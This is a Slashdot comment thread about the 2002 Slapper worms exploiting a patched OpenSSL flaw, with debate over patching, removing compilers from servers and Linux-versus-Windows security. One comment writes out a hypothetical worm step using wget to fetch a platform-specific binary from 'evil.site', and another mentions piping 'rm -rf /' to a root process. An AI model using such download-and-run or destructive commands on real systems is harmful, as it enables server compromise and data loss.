Posted by
CmdrTaco
on from the random-dune-reference-here dept.
randomErr writes "The worms, Slapper.B and
Slapper.C, which exploits a known buffer overrun vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process has infected thousands of Web servers worldwide, according to Helsinki-based F-Secure Corp., a computer and network security company. "
1. That most system admins out there are bright enough to keep their machines up to date with the latest patches.
2. Whoever is writing these worms knows how much damage they're doing to open source. It would have been preferrable to inform the OpenSSL people first, wait a month, then release the worm.
Of course, by the time you read this, the bug will have been patched.;)
It would have been preferrable to inform the OpenSSL people first, wait a month, then release the worm.
It would be preferrable to let the security at the bank to know that your about to commit armed robbery so they can stop you. Of course there is a difference between white and black hat hackers.
-- Analytic & algebraic topology of locally Euclidean meterization of infinitely differentiable Riemmanian manifold
Re:A few hopes...
by
larien
·
· Score: 5, Informative
The patches have been out for over a month, I'm pretty sure of that. I downloaded the patches as soon as Debian had the new ones online.
So, in short, it's an old bug, it's been patched, and the only ones getting hit are people who haven't patched their openssl libraries.
The bug was patched 2 months ago so I guess that is the case:>
Re:A few hopes...
by
Anonymous Coward
·
· Score: 2, Interesting
Whoever is writing these worms knows how much damage they're doing to open source.
Most likely they don't give a shit or didn't even consider it. Not everybody is politically motivated. Some people actually see computers as nothing more than a tool, and don't really care if we live in a communist "free" world or a market-driven capitalist one, as long as their computer helps them do what they want to do. It's just a hunk of silicon, steel and plastic - it has no soul, no social conscience and its configuration is no reflection on themselves.
What a revolutionary idea! Having said that remember that people writing worms are not likely to care much about the effect of their actions, whether it's denying you connectivity or canonizing Bill Gates.
Re:A few hopes...
by
Anonymous Coward
·
· Score: 0
Pfff.. it would also be better if people informed microsoft of _every_ exploit before releasing virii in the wild:)
i bet m$ developers made this worm to make friends!
After all, now the open source community and microsoft have something in common. they both suck when it comes to security;-)
> It would have been preferrable to inform > the OpenSSL people first, wait a month, > then release the worm.
Dear OpenSSL,
We are about to release an "internet worm" which will wreak havoc on the worldwide "internet" if you don't pay a ransom of... (place little finger on lower lip)...ONE BILLION DOLLARS!
Kind regards,
Dr Evil
Seriously though, I think I'm correct in saying that slapper exploits a flaw in OpenSSL patched well before the first slapper outbreak.
Pfff.. it would also be better if people informed microsoft of _every_ exploit before releasing virii in the wild:)
I know of many examples, but it's minutes before I leave for work and I cannot cite them. But I'm hoping that you (and many others) are aware that many hackers who have found exploits in Microsoft products do inform Microsoft of the problem before releasing the exploit. Microsoft turn around and ignore them and do nothing until the hacker releases the exploit out into the open. With Microsoft, you don't get anything patched unless it makes a bad PR spin.
One such example of this was the Win32 message system allowing code to elevate its privs by sending commands to higher-priv'ed processes. It was posted to/. a few weeks ago.
Problem is, it's a similar scenario to how Windows admins get burnt - it's just that there's usually a shorter interval between patch-exploit in the Windows admin world.
Any admin of either platform who uses best practices should be safe from most exploits. Shutdown unused services (and block the ports at your firewall if feasible), keep current on security patches, stay informed, and things should be manageable.
The catch is that just like there are clueless Windows admins, there are clueless Linux admins. And the clueless admins (for either platform) make their platform as a whole look bad.
Whoever is writing these worms knows how much damage they're doing to open source. Maybe these worms come from Microsoft themselves ?
Re:A few hopes...
by
BESTouff
·
· Score: 2, Insightful
Dear OpenSSL,
We are about to release an "internet worm" which will wreak havoc on the worldwide "internet" if you don't pay a ransom of... (place little finger on lower lip)...ONE BILLION DOLLARS!
Kind regards,
Dr Evil
Don't forget to half-close your eyes
Re:A few hopes...
by
AndrewHowe
·
· Score: 3, Insightful
If Open Source claims that it is somehow better at dealing with this sort of thing, and it turns out that it isn't, then it deserves the "damage" you speak of. Why should Open Source be immune from criticism? Live by the sword, die by the sword.
All of what you said could be said of Microsoft and Windows administrators, but of course we'd never say that...
Part of the problem is that servers which are already in use often never get patched. This applies to any OS.
Management at one large ISP I once worked with wanted new stuff put in to make themselves look good to their bosses. Patches just took time away from that, and didn't make anyone look good, thus it didn't happen. Until Code Red that is and probably they will panic after this one.
-- this is not a sig
Re:A few hopes...
by
pythorlh
·
· Score: 2, Insightful
The main difference that Microsoft encourages the development of clueless admins. The MCxx certifications are geared to producing admins that can pass a test, not admins who can effectively administrate. Yes, there exist lame Linux certs, too, and yes, we do have clueless Linux admins. But the whole community of Linux is based on educating the user, admin or not, about how to properly configure the system. Thus, a vastly smaller percentage of Linux admins end up clueless, and the ones that do really deserve what they get. MCxx admins often have the mistaken impression that they already know enough to do their job. Linux admins generally know what they don't know, and know who to go to to ask.
-- Do not confuse duty with what other people expect of you; they are utterly different.Duty is a debt you owe to yourself.
"2. Whoever is writing these worms knows how much damage they're doing to open source. It would have been preferrable to inform the OpenSSL people first, wait a month, then release the worm."
You hypocrite. When people released and wanted to release Windows flaws without giving MS any time to develop a patch, Open source voices said that it was good and it would help show how much slower proprietary closed source companies were to patch vulnerabilities. Now that the shoe is on the other foot...
Damage to open source... The worms are showing how insecure it is too. There is no perfect operating system.
The patches have been out for over a month, I'm pretty sure of that. I downloaded the patches as soon as Debian had the new ones online.
So, in short, it's an old bug, it's been patched, and the only ones getting hit are people who haven't patched their openssl libraries.
I am really careful about keeping my systems up to date. This worm bit me none the less. Here is why: I am running redhat, and sometime in February I updated my system from rawhide. Then I upgraded to 7.3 when that came out. Problem is that some of those rawhide packades, including openssl, had a higher version-number than any official versions being rolled out from redhat since then. So when the patched openssl came out, my system (using up2date and autoupdate) ignored the new package.
I think I will try to stay away from rawhide in the future.
--
---------------------------------------------
"Don't let them generation-gap you!" - W. Gibson
Yeah, the admins should have patched this up. Wanna know the funniest? Check this article where a security writer got hit with Slapper. It shows even those who should know better sometimes get hit.
But the whole community of Linux is based on educating the user
Ahh, would this be the RTFM mantra?
Linux admins generally know what they don't know
Interesting, I've always wondered whether an exploit gets picked up publicly before a program exists to exploit it, or does the program generally exist first?
Whilst there are cases where you are correct, the one you cited was a poor choice. I assume you are referring to 'shatter' as written by Fat^H^Hoon. The article was submitted to both slashdot and kuro5hin, and despite anti-MS bias (esp. on slashdot) the majority of people laughed at it.
Everyone agreed that the problem is with the application, not the messaging system. If I am a normal user, then why the fuck do I have a dialog window with root privileges? It's like creating a unix app that pipes commands to suid-root bash and granting execute permissions to all users. Then you can claim that the unix pipe commands are insecure because it allows you to pipe "rm -rf/" to this higher privilege process...
Incidentally, MS make no secret about this, and have acknowleged the possibilities way before Foon did - their stance I believe is "security ends at the desktop" which is exactly where it should end. If an app vendor chooses to give users a dialog running as root then it's clear who's to blame.
Re:A few hopes...
by
Anonymous Coward
·
· Score: 0
Gee, just like the fucking RedCode worm. The fixes were out for a month before it hit. You fuckers are just now learning that your POS OS isn't as secure as you've been touting all these years. Worse yet, you're subject to the exact same security problems: crappy admins.
Re:A few hopes...
by
Anonymous Coward
·
· Score: 0
A few weeks ago someone posted an article about THE SAME WORM!! Jesus, people need to start paying attention, this is nothing new.
2. Whoever is writing these worms knows how much damage they're doing to open source. It would have been preferrable to
inform the OpenSSL people first, wait a month, then release the worm.
To be fail to the OpenSSL guys, there was a fix out BEFORE this worm was created.
To not be fair to the OpenSSL guys, someone (Smarter than I) needs to rewrite OpenSSL, there are GOTOs in there!! Eeewww!
No one said anything about Windows in this thread, troll.
What I find amusing is the thought that because of the availability of source code for both the vulnerable and fixed versions of this application, that even an unclever hacker could run a diff to see what was changed, then know exactly how to write code that would crack the server.
Not like I'm complaining, a good exploit is actually needed whenever there is a vulnerability. The exploit becomes a vital unit test to ensure that that particular vulnerability stays repaired in future versions.
it's not the GOTO's that are bad, it's the programmers that use them poorly that make them bad. would you say that #include directive is bad? well, how about this:
if(foo > 0) { #include "bar.c" }
looks pretty nasty to me and yes, i have actually seen this in some code for a very large project. maybe we should put #include's in the same category as GOTO's?
Re:A few hopes...
by
Anonymous Coward
·
· Score: 0
RTFM is telling someone that the answer to their question is in the FAQ. It's short hand so that you can quickly move on to more important questions in your mail box instead of answering the same newbie questions time after time after time.
Re:A few hopes...
by
Anonymous Coward
·
· Score: 0
> It would be preferrable to let the security at the bank to know that your about to commit armed robbery so they can stop you.
Exactly. Lots of organizations have security groups that do this sort of thing. "We're going to be testing everyone's security by staging several kinds of breakins. Our operatives will be carrying proper ID, which they will show you if you manage to apprehend them. But we won't tell you the time or place of our attack..."
There is a history of security firms doing this sort of thing, with the full knowledge of their customers' top management. There is also a history of accounting departments inserting dummy data as a test of the auditors. If the auditors don't find it, they flunk.
Any organization NOT doing this sort of test of their security is vulnerable.
-- Those who do study history are doomed to stand helplessly by while everyone else repeats it.
Re:A few hopes...
by
n9hmg
·
· Score: 3, Insightful
explain RTFM? While it incorporates profanity, and is therefore inherently rude, it isn't always meant or taken that way. There's a reason people right documentation, and it's not for finger exercise. No documentation I ever read was perfect, but most of it answers most questions I have about the application. I see the anagram used more commonly in the form of "DOH! I should have RTFM". It gets used pejoratively towards the people who are too freaking lazy to RTFM. You'd be amazed, for instance, how many people go on a newsgroup for an application, and ask questions that are addressed and answered in the first 25 displayed lines of the man page.
I answer a lot of questions on a newsgroup for a popular utility. On obvious RTFM questions, I always note the questioners name, domain, and writing style and cut them extra slack if they appear to be non-native speakers of English(technical translation is notoriously tricky). Otherwise, I simply copy/paste in the appropriate few lines of the man page, always including the headers to show where it came from, and introduced with something like "I could explain in my own words, but I think the author of the man page did a better job than I could." Here on/., people are often more terse, and when somebody says or asks something ignorant (or maybe just plain stupid), responders can get pretty rude. In your troll against Linux culture: Somebody who's too lazy or stupid or illiterate to RTFM can't be a decent unix admin, and a sharp, rude reminder of that fact makes the good ones better, and makes the bad ones go back to windows.
Re:A few hopes...
by
evilpenguin
·
· Score: 5, Insightful
And any organization doing this sort of test is STILL vulnerable. That's the problem with trying to prove a negative. Just because an intrusion failed this time does not mean that it will next time. Now, I'm not arguing against performing the kind of assessment and audit you are talking about here, but such tests are only part of the process.
I'm a bit sad that this has turned into an "open source is STILL better than Windows" thing (even though I think it is). When it comes to security, everybody in the software game has problems. The finger pointing is useless. The lessons of this attack are exactly the same as the lessons of previous attacks, whether on close or open code:
1. Software engineering needs to improve. The exploitable errors are patterns that keep on happening. As a programmer myself, I have made these mistakes. As a trade/guild/profession we need to take the time to learn these patterns and methods to avoid them. We (and I definitely include myself in this) are doing a lousy job.
2. Computer operations are doing a lousy job of keeping systems secure. This one is important, but less important than issue one, becuase system admins shouldn't have to patch systems constantly. That they have to is more a measure of the failures of software engineering than the failures of system admins. That said, until we programmers get our house in order, it does fall on admins to patch, patch, patch. This sounds simple, but it isn't. When you are talking about mission-critical systems, it is extremely dangerous to apply untested patches to production machines. So dangerous that good admins don't do it. They test patches on their test machines, and well run systems will go through applications regression testing for each set of patches. This takes time. Time during which the production systems run unpatched. Sometimes these patches come in stochastic bunches such that some patches go unapplied for months, simply because the patch came in after regression testing is too far along to start over. This leads to an ironic situation: The most critical systems to a business are often the most vulnerable. Judgement about whether a patch is for an issue is so critical that it should short-circuit regression testing is a difficult art. And what if the production systems doesn't work after the patch? Sure, you can back up; you might keep your deployments in a CVS-like archive so you can roll back in minutes, but what if even a few minutes is a few hundred thousand dollars, or a few million? How many times can you afford the risk?
One problem with many of my fellow Free Software advocates (note I said "many" and not "all") is that they have not worked in mission-critical production environments in multi-billion dollar enterprises. Many of my fellow Open Source fans have worked in environments where it is no big deal to bring the server down for ten or fifteen minutes. When those are the only kind of shops you have worked in, it is difficult to understand how serious and difficult these issues can be for some.
So don't turn this into a Windows vs. Open Source thing. We (Open Source folks) have to suck it up this time. So what? The issues are the same. Our track record is still better, but, in this situation, the past is meaningless. Where are we now? Unfortunately we are in the same place (and so is the closed world): We are still making the same mistakes in software development and asking the admins to clean up the mess. We are even blaming the admins for it, when it really is not their fault.
All of this was triggered by the previous poster's correct comments about audit and assessment. He/She's right, except that these measures are locking the stable door after the horse has bolted (except sometimes the horse hasn't yet bolted -- that's why you still do it). The problem is we software developers have made a stable door that you can walk away from with it unlocked. If we hadn't done that in the first place...
It is getting better. I'm seeing more books on programming to avoid security problems. We're learning. But there are a lot of us, and we aren't all getting the education.
Re:A few hopes...
by
Anonymous Coward
·
· Score: 0
The main difference that Microsoft encourages the development of clueless admins. The MCxx certifications are geared to producing admins that can pass a test, not admins who can effectively administrate.
Actually, the Windows 2000 and newer tests are pretty good, much better than the older ones. The problem is that the tests are so popular that there is a whole industry based on helping you pass the test. I know a few people who spent thousands to go to one of those MCSE bootcamps and just took the tests until they passed them. I would really like it a lot better if Microsoft required at least one of the exams to be hands-on troubleshooting scenario similar to what you find in some of the other certs.
Re:A few hopes...
by
Anonymous Coward
·
· Score: 0
Do you know how buffer over-runs work? By your comment, I would guess that's a very solid "no". You see, when a buffer is unchecked, it may be possible to expose the code to conditions that will cause the program to behave differently. By doing this, you might be able to have the program operate foreign code at the memory space of the buffer, and any foreign code would have privlage identical to the program that it's taking over.
Once you patch a buffer over-run like this one, an attack on it is fruitless. The only way to re-exploit it is if there were still an over-run, with dofferent conditions. Since that's very likely to be untrue, that buffer is pretty safe. The only thing an attacker can gain through the use of source code is another way to exploit some other buffer, which is sometimes entirely possible with huge libraires like SSL, and programs like Apache. It's a real job to get the bugs out.
You're right. Both are examples of phenominally bad code. Any statement can be used poorly. I think the point that was being made is that there is no way to not use goto badly. The only reason that goto even exists is to be a shortcut around bad code design.
If you can't do it without a goto, then maybe you should go over your design again and look for a better way.
Just my opinion. I could be wrong. I doubt it, though.
-- I want all of the power and none of the responsibility.
Re:A few hopes...
by
Anonymous Coward
·
· Score: 0
Yeah, and who wants to bet that MS is somehow behind a good portion of these exploits in linux? They have the manpower, resources and motive. Whenever something happens to open source software, they make a pretty big deal about it...
Re:A few hopes...
by
Anonymous Coward
·
· Score: 0
every single loop (for, while) and most conditional statements (if, switch) use goto. Just because it's inserted by the compiler doesn't change the fact.
Goto is one of the fundamental operations of all computer programs.
Um, I am fairly familiar with the concept of a buffer overrun-- in fact, you don't need to check the buffer, you probably want to check your input... the buffer isn't going to overrun all by itself. What I am not so familiar with is how you got from my comment to yours. Perhaps you are not so familiar with the concept of unit testing?
If you are trying to say that taking a known exploit and turning it into a unit test is a bad idea, then please say that. But it's stupid to throw away a perfectly useful unit test just because you say you've fixed the bug. What if someone swaps out your repaired routine entirely and rewrites it-- accidentally rewriting the buffer overflow you repaired? Having the exploit as a unit test will catch this. Your approach won't.
-- I do not have a signature
Re:A few hopes...
by
Anonymous Coward
·
· Score: 0
Microsoft produces no more clueless Admins then say Red Hat or any of other mainstream linux distributions that have a checkbox during the install to enable Web Servers, Email Servers, FTP servers, etc. People are setting up services on both Linux and Windows have have no clue how they work or what they do. Whether your on Windows or Linux and idiot admin is going to be open to this stuff. We had our Linux DNS server hacked last month for just this reason. This is an education problem not an operating system problem.
Re:A few hopes...
by
Anonymous Coward
·
· Score: 0
I know there was an OpenSSL bug in OpenBSD release, but a patch for that was released more then a month ago. Is this another bug? I notice no mention of OpenBSD this time, instead it was Linux variants. Has this bug just been discovered? or was it from a few months ago, and an exploit was just released to exploit Linux?
OK... totally off-topic here, but I wanted to respond to this with some thinking I've been doing lately:
Interesting point that you make at the end: "This is an education problem not an operating system problem." But, this is wrong. The real answer is that computers are still too hard to use. You are applying this towards the admin end of things, but I am going to shift to the users in a little bit.
As far as the admins go, I think we need to work towards a time when there is no need for an admin. WHAT!!? Heresy you say? No, practicality. Technicians that repair/swap out broken hardware should be around, but OSes and networks should pretty much run themselves.
The original automobiles were hard to use and generally operated by people with a sharper intellect and an ability to work on their cars. Today, any monkey can (almost) operate a car with a minimum of education. And when it breaks down, they take it to a technician to fix the problem. The end-user does not need to know anything about how it operates to get it to move and take them places. That's the direction computers should go in, from both the admin and user perspectives.
Again... the car example: you don't see people getting certified to drive different cars by make, do you? Going from one OS to another should not be as difficult as it is. There are many reasons for the difficulty: monopolies putting up roadblocks, open source programmers who aren't writing for Joe Average, an outdated platform (x86, ISA, PCI...), etc...
As far as users go, I think that we expect too much of them. Even in the Windows world, things that should be simple procedures are difficult if you don't have the "right" software.
Over the weekend, my dad asked me how he could record himself onto a CD with his burner (in Windows). I thought... Easy! I spent the better part of the afternoon trying to show him how to use his limited edition of Roxio and Audacity in conjunction to do this. (He can't afford to buy anything better and he can't use Linux) It turned out not to be so easy after all. The concept of using two different apps to access/create data for each other is an alien and confusing concept to most people since they don't get the abstraction and have problems thinking in a hierarchical fashion. My dad was just hoping to be able to plug in a mic, press record and get his voice on a CD. He didn't want to mess with creating folders and files and editing his recordings. Sure, there are some programs that would keep the user in one application throughout the process, but it's still alien to them. This is why I still say computers are not easy to use.
Just like cars, there will always be a small population of people who understand computing devices pretty thoroughly, and there will always be others who just want to turn the key and drive. So, it's not an education issue, it's a platform, OS, application issue. Ditch the old way of thinking and look at it this way... Someday computing should be happening all around us without any need for us to directly interact. The entire world around us should be one big user interface. Forget "desktop" environment and think about getting computing into the physical realm... Then we won't have what appears to currently be an education problem. And... if we apply this thinking to open source projects now, we'll be right on track with where the world is going.
-- -"...bad old ideas look confusingly fresh when they are packaged as technology" - Jaron Lanier (Digital Maoism on Edge.o
You think this is tied to the popularity increas of Linux in the userbase?
Yes, just like in the case with Windows.
-- Beware: In C++, your friends can see your privates!
Re:Bravo
by
Anonymous Coward
·
· Score: 0
Great spin!
1. Linux is catching up to windows! Ha ha...
2. Linux is so popular, sophisticated worms are appearing!
Go into politics - a bright future awaits. But give up on the idea of determining the worm's origins, you wouldn't be able to tell anyway.
Re:Bravo
by
Anonymous Coward
·
· Score: 0
Bullshit. Windows servers make up less of the market than Linux.
And how fast did code red spread? Almost fifty thousand in a single day? NONE were Linux. Popularity has nothing to do with Windows exploits. It's just so god damned easy.
You didin't quite catch the next line in the grandparent post?
His point was that Linux has been widespread on webservers for a while now. It's not the ever-growing Linux userbase that's the _direct_ cause of this worm.
Though, you have a point. A growing Linux user base attracts the kind of people that creates worms as well.
Re:Bravo
by
Anonymous Coward
·
· Score: 0
Windows servers make up less of the market than Linux.
Sorry, try again troll. More websites are run on Apache than IIS but this says nothing of web servers let alone file servers, application servers, mail servers, etc. I think you will find that Microsoft leads in physical web servers according to Netcraft but Apache is popular with webhosts that host hundreds of websites on one server. I think you will also find that true Unix's are still more popular that Linux on application servers and the such.
Somebody must have the link to the website that has the ratio of viruses to server. Microsoft still had a larger ratio but it was not as disparate as you would think. If I remember it was one of the BSD's that had the lowest ratio.
"The worms, Slapper.B and Slapper.C, which exploits a known buffer overrun vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process has infected thousands of Web servers worldwide, according to Helsinki-based F-Secure Corp., a computer and network security company. "
Time to grab a coffee.. I thought it said "thanks to Helsinki-based F-Secure Corp.":-)
Re:Misread
by
Anonymous Coward
·
· Score: 1, Funny
Time to grab a coffee.. I thought it said "thanks to Helsinki-based F-Secure Corp.":-)
Good idea. Get me one too.
Re:Misread
by
Anonymous Coward
·
· Score: 1, Funny
use chkrootkit to see if you've gotten it
by
motorsabbath
·
· Score: 5, Informative
http://www.chkrootkit.org/
version 0.37 has been updated to find the slapper - JB
-- The heat from below can burn your eyes out
Re:use chkrootkit to see if you've gotten it
by
RudeDude
·
· Score: 2, Informative
FYI The most common MD5 sig for the 0.37 tarball seems to be: b0feebea67655daa440da92099dd5187
But for some reason I also see a different MD5 for what is supposed to also be 0.37: edf50a9c8c6bf09b0a9147f2e6168826 BUT that is actually the signature from 0.35
So the bottom line is, try not to panic. Some mirrors are just a little out of sync. I am still a little nervous running this thing as root since I haven't seen anyone report that it's not a trojan itself. I guess some code review is in order.:)
-- RudeDude
Perl/Linux/PHP hacker
Re:use chkrootkit to see if you've gotten it
by
Surye
·
· Score: 0
I have been using this for a while, and I have seen no sign of it being a trojen it self.
Re:use chkrootkit to see if you've gotten it
by
friedmud
·
· Score: 2
As a side note - you should know that if you were using Gentoo linux all you have to do is:
emerge chkrootkit
And it will get the source, check the md5, compile, and install it for you.
Derek
Re:use chkrootkit to see if you've gotten it
by
Anonymous Coward
·
· Score: 0
On my Redhat 7.2, The chklastlog script is looking for/var/adm/lastlog. I changed it to:
#define LASTLOG_FILENAME "/var/log/lastlog"
and recompiled to get it to work.
oh no!
by
Anonymous Coward
·
· Score: 0, Funny
This is the sort of thing that makes open source (and linux) look amateurish, unprofessional, and insecure. Coming only a day after Microsoft's jihad against Open Source, though, could it be a coincidence?
What do you think are the chances Microsoft employees are contributing buggy patches to key open source projects, causing buffer overruns and worms? It looks like they've found Open Source's achilles heel:(
So what can we do about it? Maybe we should abandon the GPL (which allows anyone to contribute ticking timebomb patches) and use a better license, such as the Microsoft Shared Source license. That may be the only way to save linux!
"What do you think are the chances Microsoft employees are contributing buggy patches to key open source projects"
How nice. Or should I say how pathetic? You have absolutely zero evidence they do that sort of thing but you throw shit like that out there just to stir things up. And I realize that you don't actually accuse them of doing it, but just by mentioning it you have basically done the same.
I'd say that this looks more like an Apache worm than a Linux worm. It does not seem too bad though, "Get your Apache systems patched and update your antivirus software and you should be fine." (from the Slapper.C article).
This shows that Linux+Apache is so widely accepted that it is a legitimate virus target. Enjoy it!
No. This is purely an openssl problem. It was patched in July! The "blame" goes with those who don't apply security patches marked as critical. The worm could as easily have been written to attack users of unpatched installations of stunnel-win32, but that wouldn't be nearly as satisfying for a worm-writer as something that can attack apache on linux.
You should put this on your resume when you apply at Microsoft...
Same mantra applies to Linux and MS sysadmins:
by
bittmann
·
· Score: 5, Informative
1) Don't enable services and features you don't need (or in MS sysadmin speak--DISABLE all of the services and features you don't need that have "helpfully" been activated in the base install); and
2) Keep up to date on your patch levels.
You don't have to be bleeding-edge on patches, but when a security vulnerability with malicious code in the wild has been detected, it's time to *DO* something about it!
Really, I wonder how many of these infected websites were actually USING SSL, as opposed to having that port hot but unused...
Re:Same mantra applies to Linux and MS sysadmins:
by
petard
·
· Score: 5, Informative
I would add the following:
3) Don't install a development environment (e.g. gcc, which is required for this worm to propogate) on a publically exposed web server!
Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated:-).
If you must use a compiler on your web server, FFS run the publically accessible service in a chroot jail!
-- .sig: file not found
Re:Same mantra applies to Linux and MS sysadmins:
by
rmadmin
·
· Score: 2
1) Don't enable services and features you don't need (or in MS sysadmin speak--DISABLE all of the services and features you don't need that have "
helpfully" been activated in the base install);
Or in Solaris sysadmin speak, or in redhat sysadmin speak. For instance, solaris tends to run NFS stuffs by default. And Redhat (probably a few other distro's too), tend to have a dozen or so unused services running.
Re:Same mantra applies to Linux and MS sysadmins:
by
mjh
·
· Score: 2
2) Keep up to date on your patch levels.
Thank you, debian, for apt. Here's how I keep up to date with patches:
apt-get update && apt-get -u upgrade
Apt is such a great idea. It's a better idea than RHN or whatever it is that mandrake is doing. Why? Because there are a ton of debian developers, each of them only having to watch a relatively small number of packages And when they keep up with patches, I do too, for almost no work.
This is the beauty of apt - it distributes patch management among a lot of people so that the load of any of them is relatively small. But then it allows all of us to leverage that work. It's distributed AND centralized all in one.
I'm not trying to start an distro war here. I'm just *SOOO* thankful for apt and debian. I'm trying to express gratitude. If it came out as flamebait, it was not intended.
-- Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
Re:Same mantra applies to Linux and MS sysadmins:
by
mrseth
·
· Score: 2
I know. I do the same thing on my RedHat boxes with this.
Re:Same mantra applies to Linux and MS sysadmins:
by
AftanGustur
·
· Score: 2
That 1) is *extremely* important. If you're running RedHat you can use "chkconfig --list" to see what network-based services are running (all services actually).
For everything you don't know what is, don't hesitade to do a "chkconfig --del [service]". It's not realy deleted, just disabled.
Also, do a "rpm -qa" and "rpm -e [package]" for everything you don't know/need. It's better to have to spend some time fixing a problem that ypu caused yourself than fixing something that was done by an intruder.
Re:Same mantra applies to Linux and MS sysadmins:
by
andcal
·
· Score: 1
Warning! Quantum mechanics dictate that what you are observing may not be the actual contents of this post.
I thought quantum mechanics dictate that what I am observing may not be the actual state of the contents until I looked at the contents.
-- --something witty
Re:Same mantra applies to Linux and MS sysadmins:
by
slamb
·
· Score: 5, Insightful
3) Don't install a development environment (e.g. gcc, which is required for this worm to propogate) on a publically exposed web server!
Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated:-).
I keep seeing this comment, and every time I think how stupid it is. The compiler is not the security flaw. Given the number of comments like this, I fully expect the next version of this worm to have a "|| wget http://evil.site/worm-`uname -s`-`uname -m`" in place, and evil.site to have statically linked binaries. Then people will be saying "You don't need wget on a production webserver!" or some stupid shit like that. And it will move on to something else. They're already running code on your computer. You're already screwed.
(Isn't the first piece of the exploit written in assembler, as is typical for buffer exploits? Then they have to have targeted your platform specifically anyway. I just don't see why the compiler stage is necessary at all. They can just transfer the larger chunk of worm executable in the same way they transferred the source code.)
The real solution is to secure your system in the first place: disable services you aren't using. Patch ones you are. Given the month between the patch and the exploit, anyone following this practice will be unaffected.
Re:Same mantra applies to Linux and MS sysadmins:
by
petard
·
· Score: 5, Insightful
It's not stupid at all. You are correct in stating that the compiler is not the security flaw. However, if the compiler were not there, this is the 4th worm in the past few months that you wouldn't have been vulnerable to. Simply because they *could* find other means of implementing the worm doesn't mean that you should make this one easy. There are 2 goals here:
Prevent compromise. This is done by disabling unnecessary services and keeping your patch levels current, among other things.
Reduce the impact of compromises that do occur. One way to do this is, much as you disable unnecessary services, only keep the software needed for your application on the box.
As "stupid" as it may seem from an ivory tower perspective, in practice it helps. It's not a first line of defense, but it helps.
-- .sig: file not found
Re:Same mantra applies to Linux and MS sysadmins:
by
HiThere
·
· Score: 2
A nicer answer is to move the compiler to another folder and make it unfindable from the system path, and then add it to the path of selected users. I suppose you could also read protect it, but if the virus has root, that wouldn't help, and if it doesn't, then the damage it could do is minimal. (Perhaps the script to add gcc to the path should need to be manually executed? Perhaps it should not be added, but need to be specified?/usr/bin/gcc/gcc...?) Any particular solution is possible for the virus to work around, but diverse solutions would really limit the possibilities for that. (Well, not installing gcc at all is difficult to work around, but it would also make installing software a bit difficult.)
--
I think we've pushed this "anyone can grow up to be president" thing too far.
Re:Same mantra applies to Linux and MS sysadmins:
by
mjh
·
· Score: 2
Yeah I've set up a RH box doing this, too. It's nice, but it's not the same. I think the problem is that there simply aren't enough people contributing to the RPM repositories. Basically it's just Red Hat. Which is pretty good, but it's not the same as debian.
Because RH has to maintain so many packages, more or less, all by themselves, the workload on each package maintainer is pretty high. And they're not able to keep up with patches as well as debian. Security patches are kept about equally. But other non-security related patches don't seem to get into the red hat repositories as quickly as they get into debian.
But that's just my $.02 after having tried apt-rpm for a month or so. That may not have been long enough to get a very good feel for it.
-- Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
Re:Same mantra applies to Linux and MS sysadmins:
by
Anonymous Coward
·
· Score: 0
For the record: I run a personal webserver with nothing on it except a bare minimum of tools. Anything else that I thought I might want, I burned onto a CD. Now, if I do want access to wget, ftp, gcc, etc. I can pop in the CD, mount it, and away I go!
Re:Same mantra applies to Linux and MS sysadmins:
by
Anonymous Coward
·
· Score: 0
# add authorized users to the wheel group in/etc/group
chown root:wheel/usr/bin/gcc
chmod 750/usr/bin/gcc
Now apache can't compile anything. Problem solved.
Re:Same mantra applies to Linux and MS sysadmins:
by
texaport
·
· Score: 1
Same mantra -- Patch and reboot?
Time to go back to measuring uptime in hours instead of days...
Re:Same mantra applies to Linux and MS sysadmins:
by
fatboy
·
· Score: 1
Same mantra -- Patch and reboot?
Time to go back to measuring uptime in hours instead of days...
Nope. I have patched one of my Linux servers several times, it's uptime? 529 days. It rolled over to 0 days uptime at 497 days. Rebooting is for Kernel and hardware upgrades.:)
-- --fatboy
Re:Same mantra applies to Linux and MS sysadmins:
by
Anonymous Coward
·
· Score: 0
you can use perl (or even bash) to overrun a stack and insert the assembler exploit code that calls a shell script. If gcc wasn't there, they'd use something else.
Re:Same mantra applies to Linux and MS sysadmins:
by
Anonymous Coward
·
· Score: 0
Everything that helps, obviously, helps.
I set the permissions on gcc to only work for root. Not perfect, as users can scp their own files, and could set up their own compiler. So could a worm if it was that smart. But it is one hurdle amongst other hurdles. If someone or thing wants to '0wN' my box, they're going to have to work for it. Given that there are plenty o' easier targets out there, I'm relatively safe from the casual cracker or simply opportunistic worm (patch, patch, patch!).
It's almost a head game. I put on the cracker hat and think of stuff, sysadmin hat to come up with countermeasure, etc. Cultivate an evil self and fight it rather than waiting for some genuine bad guy to challenge you.
Re:Same mantra applies to Linux and MS sysadmins:
by
slamb
·
· Score: 2
As "stupid" as it may seem from an ivory tower perspective, in practice it helps. It's not a first line of defense, but it helps.
I'd have to say that removing arbitrary bits of your toolchain because some worm uses them is an ivory tower idea. It makes assumptions of a perfect system (you have a staging machine that has identical library versions, etc). When those are not true, it doesn't work out well - the version you've meticulously tested elsewhere fails in a way it wouldn't if you had compiled it locally. And the time spent doing it could be better spent running rhn_register or similar for much more real gain.
To give further examples, I expect people to say several of the following in the future:
don't have a compiler on your production machine (again. worm workaround: download compiled code)
don't have wget on your production machine. (worm workaround: use curl, links, lynx, ftp, ncftp, scp, sftp, or just implement the transfer itself; it doesn't require much code.)
add a fake/etc/hosts entry for evil.site (work by IP address, change the site name)
deny outbound connections from the webserver (this one actually would stop your machine from infecting other servers unless the attacker gets privileges necessary to change the firewall rules, but it would be really annoying)
remove/bin/uname (use/usr/bin/file to find the binary type of a standard system binary)
remove/usr/bin/file (some other trick to find system type; there are plenty)
run the webserver in a jail on a machine that is uncrippled. (Now this one actually makes sense, though it may not realistically be worth the effort.)
At some point, you've made things much more difficult for yourself and lost all perspective on a non-problem. These worms have all happened well after the patches are available.
Re:Same mantra applies to Linux and MS sysadmins:
by
WoodstockJeff
·
· Score: 1
However, if the compiler were not there, this is the 4th worm in the past few months that you wouldn't have been vulnerable to.
